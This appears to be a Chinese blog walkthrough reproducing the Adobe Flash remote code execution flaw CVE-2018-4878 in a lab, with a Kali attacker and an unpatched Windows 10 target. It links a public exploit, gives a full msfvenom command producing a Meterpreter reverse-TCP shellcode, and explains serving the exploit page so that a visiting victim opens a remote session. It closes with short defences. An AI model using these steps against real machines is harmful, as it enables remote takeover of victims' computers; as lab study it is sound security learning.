zoukankan      html  css  js  c++  java
  • Adboe Flash远程代码执行_CVE-2018-4878漏洞复现

    Adboe Flash远程代码执行_CVE-2018-4878漏洞复现

    一、漏洞描述

    该漏洞可针对windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意Flash代码文件的Microsoft Office文档、网页、垃圾电子邮件等。

    二、漏洞影响版本

    Flash Player版本28.0.0.137以及之前的所有版本

      

    三、漏洞复现环境搭建

    攻击机:kali   ip:192.168.10.136

    靶机:win10   ie默认集成flash,没有升级

    四、漏洞复现

    1.github下载exp, https://github.com/anbai-inc/CVE-2018-4878

    2.修改exp

    2.1修改shellcode为自己生成的反弹连接shellcode,首先先生成反弹连接shellcode

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt

      

    2.2用生成的shellcode替换exp中对应的shellcode

      

    2.3修改exp中生成文件保存的路径

      

    3.运行python脚本,会生成两个文件, exploit.swf和index.html

    4.把exploit.swf和index.html复制到/var/www/html,然后开启web服务, 此时,Kali Linux上Web服务启动,并且具备index.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制

    5.kali 开启监听

      

    6.靶机访问http://192.168.10.136/index.html

      

    7.此时kali端已经获取到会话

      

    五、漏洞防御

    1.下载最新版本的Adobe Flash

    2.安装常见杀毒软件,开启实时防护和杀毒引擎实时升级

  • 相关阅读:
    WPF之元素绑定
    BC9050的IP地址设置
    C#之进程、线程
    EPLAN学习笔记01
    Beckhoff模拟量模块的使用
    倍福-基于EL2521的NC轴控制
    kali之ARP欺骗获取图片流
    PHP脚本实现凯撒加(解)密
    SQL注入(一)普通型注入
    linux卸载不完全
  • 原文地址:https://www.cnblogs.com/yuzly/p/11104935.html
Copyright © 2011-2022 走看看